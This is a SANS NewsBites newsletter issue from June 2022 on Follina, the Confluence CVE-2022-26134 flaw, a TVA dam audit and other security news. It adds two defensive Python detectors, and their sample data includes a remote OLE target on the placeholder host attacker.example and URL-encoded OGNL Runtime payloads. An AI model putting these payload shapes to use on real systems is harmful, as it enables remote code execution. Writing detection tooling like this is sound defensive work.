SANS NewsBites

Active Follina Exploits and No Patch From Microsoft Drive Need for Immediate Action; TVA Has to Address Basic Security Hygiene and Governance of Federal Dam IT/OT Systems; Preview Windows Autopatch and Prioritize Implementation

June 7, 2022  |  Volume XXIV - Issue #45

Top of the News


2022-06-03

Follina Vulnerability Remains Unpatched

Microsoft has not yet released a patch to address the vulnerability known as Follina. The flaw affects the Microsoft Support Diagnostic Tool (MSDT) and can be exploited to take control of vulnerable devices. Microsoft has acknowledged that the flaw is being actively exploited and has published guidance that includes temporary mitigations. The vulnerability can be exploited through a maliciously crafted Word document. The flaw affects all currently supported versions of Windows. Microsoft has not said whether or not it plans to release a patch for the vulnerability.

Editor's Note

This vulnerability should still be at the top of the list of things to worry about. You must implement the workaround to prevent exploitation. While anti-malware vendors are quickly updating signatures, they are inadequate to protect against the wide range of exploits that may take advantage of this vulnerability.

Johannes Ullrich

The Microsoft guidance includes a workaround of disabling the MSDT service on each endpoint. Many endpoint protection tools are also now able to detect and block the attack; check to see if you're covered there. Additionally, verify your email security services are enabled and are detecting and blocking this attack. While blocking externally sourced Office documents is also an approach, use caution, as this is likely impactful to the business and likely will be worked around by users.

Lee Neely

Just a reminder that SANS had a webinar on Follina you can view at https://www.sans.org/webcasts/emergency-webcast-msdt-ms-word-0-day/ and published a Follina Q&A with SANS instructor Jake Williams at https://www.sans.org/blog/follina-msdt-zero-day-q-a/

John Pescatore
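As an added example (not code from SANS, Microsoft, or the ISC diaries linked below), the following Python script triages a .docx for the delivery pattern that public analyses of the Follina documents described: an OLE object relationship in word/_rels/document.xml.rels whose target is an external URL, which Word fetches and which in turn invokes the ms-msdt: protocol handler. The sample documents are constructed in memory; the hostname in the suspect one is a placeholder, not an indicator.

```python
"""Triage a .docx for the Follina delivery pattern (added example).

Not code from SANS, Microsoft, or the ISC diaries; it reads the document
relationships part and flags an OLE object that Word must fetch from a
remote URL, plus any occurrence of the ms-msdt: scheme inside the package.
"""
import io
import re
import zipfile
import xml.etree.ElementTree as ET

RELS_PATH = "word/_rels/document.xml.rels"
RELS_NS = "{http://schemas.openxmlformats.org/package/2006/relationships}"
OLE_TYPE_SUFFIX = "/oleObject"
MSDT_SCHEME = re.compile(rb"ms-msdt:", re.IGNORECASE)


def scan_docx(data: bytes) -> list:
    """Return (rule, detail) findings for one .docx given as bytes."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        names = zf.namelist()
        if RELS_PATH in names:
            root = ET.fromstring(zf.read(RELS_PATH))
            for rel in root.iter(RELS_NS + "Relationship"):
                rtype = rel.get("Type", "")
                target = rel.get("Target", "")
                mode = rel.get("TargetMode", "Internal")
                # Embedded OLE objects live inside the package; one that points
                # at an http(s) URL is the hallmark of the Follina documents.
                if (rtype.endswith(OLE_TYPE_SUFFIX) and mode == "External"
                        and target.lower().startswith(("http://", "https://"))):
                    findings.append(("external_ole_object", target))
        # Second check: the scheme string anywhere in the package, since the
        # handler can also be reached without the remote hop.
        for name in names:
            if MSDT_SCHEME.search(zf.read(name)):
                findings.append(("ms-msdt_scheme", name))
    return findings


def build_docx(rels_xml: str, extra_parts: dict = None) -> bytes:
    """Constructed minimal .docx containing only the parts the scanner reads."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("[Content_Types].xml", "<Types/>")
        zf.writestr("word/document.xml", "<w:document/>")
        zf.writestr(RELS_PATH, rels_xml)
        for name, body in (extra_parts or {}).items():
            zf.writestr(name, body)
    return buf.getvalue()


REL_NS_DECL = 'xmlns="http://schemas.openxmlformats.org/package/2006/relationships"'
OLE_TYPE = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject"

# Constructed: an ordinary document with an embedded (internal) OLE object.
BENIGN_RELS = f"""<?xml version="1.0" encoding="UTF-8"?>
<Relationships {REL_NS_DECL}>
  <Relationship Id="rId1" Type="{OLE_TYPE}" Target="embeddings/oleObject1.bin"/>
</Relationships>"""

# Constructed: the Follina shape, an OLE object fetched from a remote URL.
# The hostname is a placeholder, not an indicator of compromise.
SUSPECT_RELS = f"""<?xml version="1.0" encoding="UTF-8"?>
<Relationships {REL_NS_DECL}>
  <Relationship Id="rId5" Type="{OLE_TYPE}" Target="http://attacker.example/page.html!" TargetMode="External"/>
</Relationships>"""


def demo() -> dict:
    """Scan the two constructed samples; used by the stand-alone run."""
    return {
        "benign": scan_docx(build_docx(BENIGN_RELS)),
        "suspect": scan_docx(build_docx(SUSPECT_RELS)),
    }


if __name__ == "__main__":
    for label, result in demo().items():
        print(f"{label}: {result or 'clean'}")
```

The relationship check is the one worth feeding into mail gateway or sandbox triage: a legitimate embedded OLE object is stored inside the package, so an external http(s) target on an oleObject relationship is rare in business documents. The scheme search is a cheaper second pass that also catches documents that reach the handler directly.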

2022-06-05

Follina is Being Actively Exploited

Threat actors believed to be acting on behalf of an as-yet unidentified government have been exploiting the Follina vulnerability to target US and European government organizations. The threat actors sent at least 1,000 phishing messages that contained a maliciously-crafted document that pretended to be information about a salary increase.

Editor's Note

One set of Follina exploits sighted is taking advantage of a digital signature that was created using a key stolen from software company Clickstudio. More sophisticated exploits like this will often bypass defenses.

Johannes Ullrich

Make sure your shields are up, IOCs in place and you've implemented your plan to mitigate the risks of a Follina attack.

Lee Neely

2022-06-03

Audit Raises Questions About Federal Dam Cybersecurity Accountability

The Tennessee Valley Authority (TVA) Office of Inspector General’s audit of the TVA’s non-power dam control system cybersecurity “found no clear ownership of the non-power dam control system; vulnerable versions of operating systems and control system software; inappropriate logical and physical access; [and] internal information technology controls [that] were not operating effectively or had not been designed and implemented.”

Editor's Note

The deficiencies are mostly basic security hygiene issues – Implementation Group 1 of the Critical Security Controls. Most of IG1 is really related to shortcomings in IT (or in this case OT) operations and governance – updating applications and operating systems to current versions, having clear business ownership of systems, etc. The TVA has said it will remedy deficiencies by May 2023, but the OT operations and governance issues should be addressed ASAP.

John Pescatore

This is foundational cyber hygiene. Make sure that you have a comprehensive inventory of systems and that ownership, particularly of the security, is well defined. Then make sure that you are verifying the security posture, remediating gaps when discovered. Verify you have policies and procedures to support systems being deployed as securely as possible with open lines of communication on not only how to approach that, but also how to remediate discovered issues without throwing anyone under the bus.

Lee Neely

2022-06-06

Windows Autopatch Now in Preview

Microsoft has made its Windows Autopatch service available for public preview. The service will be generally available in July to customers with Windows Enterprise/Microsoft 365 E3 or E5 licenses.

Editor's Note

Per earlier NewsBites comments on Windows Autopatch, if you have the right licenses, try it out across a controlled test environment. The security gain is a given and application issues due to the patches are very likely to be less than you anticipate.

John Pescatore

Reducing the workload of keeping endpoints updated is a big win. This service is designed to work with enterprise devices without necessitating a VPN connection. Note the prerequisites, which include device management via Intune or Configuration Manager co-management, and user accounts in Azure Active Directory or Hybrid Azure Active Directory Join. You may already meet these requirements for your enterprise systems.

Lee Neely

This should be enabled by default across all enterprises and systems. Fear of breaking applications is overstated. The risk of unpatched systems is a demonstrable problem.

William Hugh Murray

The Rest of the Week's News


2022-06-04

Atlassian Releases Patches for Critical Confluence Server and Data Center Vulnerability

Atlassian has released fixes to address a vulnerability (CVE-2022-26134) affecting its Confluence Server and Data Center products. The flaw can be exploited by an unauthenticated user to execute arbitrary code. The issue affects all supported versions of Confluence Server and Data Center; the fixed versions are 7.4.17, 7.13.7, 7.14.3, 7.15.2, 7.16.4, 7.17.4, and 7.18.1. Customers whose Confluence sites are hosted by Atlassian and accessed through an atlassian.net domain are not affected.

Editor's Note

The flaw dates to Confluence Server and Data Center products version 1.3.0. The long-term fix, if you're continuing to host your Atlassian instance, is to update to the latest long term support release. If you're in a cluster, make sure that you don't forget to update all the nodes. Atlassian is pushing customers towards a hosted solution; after you apply the updates, this would be a good time to have those conversations, to include recording any show-stoppers to avoid re-hashing known issues.

Lee Neely
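As an added example (not Atlassian's or Rapid7's code), the following Python script scans web server access logs for the exploitation pattern that public reports of CVE-2022-26134 described: an OGNL expression, usually URL-encoded, placed in the request path. The log lines are constructed in the combined log format with TEST-NET placeholder addresses, and the expression in them is illustrative rather than a specific exploit.

```python
"""Flag CVE-2022-26134 exploitation attempts in Confluence access logs.

Added example, not Atlassian's or Rapid7's code. Public reports describe
an OGNL expression, usually URL-encoded, placed in the request path; this
script decodes each request path and looks for that expression syntax.
"""
import re
from urllib.parse import unquote

# Combined log format: client ident user [time] "METHOD path PROTO" status size
LINE_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)
# OGNL expression syntax once decoded (%24%7B ... %7D on the wire).
OGNL_RE = re.compile(r"\$\{[^}]*\}")
# Fragments commonly used to reach code execution from an OGNL expression;
# their presence raises confidence, but a ${ } match alone is worth a look.
SUSPICIOUS = ("@java.lang.runtime", "getruntime", "processbuilder", "@com.opensymphony")


def decode_path(path: str, max_layers: int = 3) -> str:
    """URL-decode up to max_layers times; double encoding is a common evasion."""
    for _ in range(max_layers):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    return path


def analyze_line(line: str):
    """Return a finding dict for a suspicious request, else None."""
    m = LINE_RE.match(line)
    if not m:
        return None
    path = decode_path(m.group("path"))
    if not OGNL_RE.search(path):
        return None
    lowered = path.lower()
    return {
        "src": m.group("src"),
        "ts": m.group("ts"),
        "status": int(m.group("status")),
        "path": path,
        "indicators": [s for s in SUSPICIOUS if s in lowered],
    }


def scan_log(lines) -> list:
    """Run analyze_line over an iterable of log lines and keep the hits."""
    return [hit for hit in map(analyze_line, lines) if hit]


# Constructed sample lines (TEST-NET addresses); the expression is illustrative.
SAMPLE_LOG = [
    '203.0.113.7 - - [03/Jun/2022:10:15:01 +0000] "GET /login.action HTTP/1.1" 200 5120',
    '203.0.113.9 - - [03/Jun/2022:10:15:09 +0000] "GET /%24%7B%40java.lang.Runtime%40getRuntime%28%29%7D/ HTTP/1.1" 302 0',
    '198.51.100.4 - - [03/Jun/2022:10:16:22 +0000] "GET /pages/viewpage.action?pageId=123 HTTP/1.1" 200 8190',
    '203.0.113.9 - - [03/Jun/2022:10:17:00 +0000] "GET /%2524%257B%2540java.lang.Runtime%2540getRuntime%2528%2529%257D/ HTTP/1.1" 302 0',
]

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(f'{hit["ts"]} {hit["src"]} {hit["status"]} {hit["path"]} {hit["indicators"]}')
```

Point it at reverse proxy or Tomcat access logs in the combined format, adjusting LINE_RE if your log pattern differs. Decoding the path before matching matters: the single-encoded and double-encoded lines above are the same request, and a filter that only looks for the literal `${` in the raw log misses both.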

2022-06-06

US Draft Legislation Would Create National Data Privacy and Security Framework

US legislators in both the House of Representatives and the Senate have released a discussion draft of legislation described as “a comprehensive national data privacy and data security framework.” The draft bill would designate the Federal Trade Commission (FTC) as regulator for the proposed rules, which would pre-empt some state data privacy and security laws.

Editor's Note

The US Congress has failed to pass federal data privacy laws many times over the past 15 years, so it is hard to be optimistic that this will actually pass, but some of the thornier issues (like the preemption issue) have been addressed in this draft. The FTC has a good track record in this area – SANS gave the agency a Difference Makers award back in 2013. If the law passes, the FTC will have a year to establish the new office and define squishy terms such as “reasonably necessary, proportionate, and limited…” The draft also attempts to address social media algorithms, a controversial area.

John Pescatore

One hopes this time we get something enacted. Getting a common bar at the federal level should help raise the bar across the nation. One thing to keep an eye on is which state laws are preserved/not preempted. Generally, state laws to be preserved include consumer protection, civil rights, student and employee privacy, data breach notification, contract and tort, fraud, theft and identity theft, unauthorized access to electronic devices, and unauthorized use of personal information, cyber stalking, cyber bullying, sexual harassment, etc.

Lee Neely

2022-06-03

New York’s Right to Repair Bill for Electronics

The New York State legislature has passed an electronics right-to-repair bill, the Fair Repair Act. The bill would require electronics makers to share diagnostic and repair information with consumers and independent repair shops and to make software, tools, and parts available to them. The governor has not yet signed the bill into law.

Editor's Note

This is a big step forward for local electronics repair shops in New York State, and offers hope for less expensive repair options, rather than wholesale replacement of damaged electronic devices. Once signed into law, there will be a year for implementation. Note the bill applies only to electronics; medical devices, home appliances, agricultural and off-road equipment, public safety communication equipment or motor vehicles are not subject to the bill.

Lee Neely

Note that for most enterprises, repairing mobile devices yourself will be significantly more expensive than even what Apple charges, but this may help drive repair prices down in the long run.

John Pescatore

2022-06-03

Security Flaws in BD Synapsis, BD Pyxis, and Illumina Medical Devices

The US Cybersecurity and Infrastructure Security Agency (CISA) and the Food and Drug Administration (FDA) have warned of security vulnerabilities in several medical devices. Flaws in BD Pyxis automated medication dispensing systems could be exploited to gain access to protected health information (PHI). A vulnerability in the BD Synapsis microbiology informatics software platform could be exploited to modify data, which could result in incorrect or delayed treatment. A handful of vulnerabilities in Illumina in-vitro diagnostic devices and research use only instruments could be exploited to take control of unpatched devices.

Editor's Note

Illumina has released a patch that protects against remote exploitation as a stopgap until the permanent fix can be released; BD is releasing Synapsis v4.20 SR2 later this month to address the weakness. BD Pyxis is working to remove hard-coded credentials and is piloting a credential management solution as a long-term fix. In the interim, you're going to want to make sure the devices are properly segmented, only allowing connections from authorized devices and users.

Lee Neely

2022-06-06

Palermo, Italy Suffers Cyberattack

Computer systems belonging to the city of Palermo, Italy were targeted in a cyberattack late last week. Palermo has a population of 1.3 million and is also a popular destination for tourists. As of Monday morning (June 6), all public services, websites, and portals are offline.

Editor's Note

Details are sparse; actions taken align with a ransomware versus DDoS attack. Some services are operating with fax rather than digital communication mechanisms. The city has engaged an IT service restoration company, SISPI, which is also helping to coordinate updates as well as service restoration.

Lee Neely

Internet Storm Center Tech Corner

Sandbox Evasion... With Just a Filename!

https://isc.sans.edu/forums/diary/Sandbox+Evasion+With+Just+a+Filename/28708/


MS-MSDT RTF Maldocs Analysis oledump Plugins

https://isc.sans.edu/forums/diary/msmsdt+RTF+Maldoc+Analysis+oledump+Plugins/28718/


Clickstudio (Passwordstate) Code Signing Cert Used by Follina Malware

https://clickstudios.com.au/advisories/Incident_Management_Advisory-03-20220607.pdf


Cybercriminals Exploit Reverse Tunnel Services and URL Shorteners

https://cloudsek.com/whitepapers_reports/cybercriminals-exploit-reverse-tunnel-services-and-url-shorteners-to-launch-large-scale-phishing-campaigns/


Unpatched Horde Webmail Bug

https://blog.sonarsource.com/horde-webmail-rce-via-email/


Atlassian Exploit Released

https://www.rapid7.com/blog/post/2022/06/02/active-exploitation-of-confluence-cve-2022-26134/


GitLab Critical Security Release

https://about.gitlab.com/releases/2022/06/01/critical-security-release-gitlab-15-0-1-released/


U-Boot Vulnerabilities

https://research.nccgroup.com/2022/06/03/technical-advisory-multiple-vulnerabilities-in-u-boot-cve-2022-30790-cve-2022-30552/


Unisoc Baseband Chip Vulnerability

https://research.checkpoint.com/2022/vulnerability-within-the-unisoc-baseband/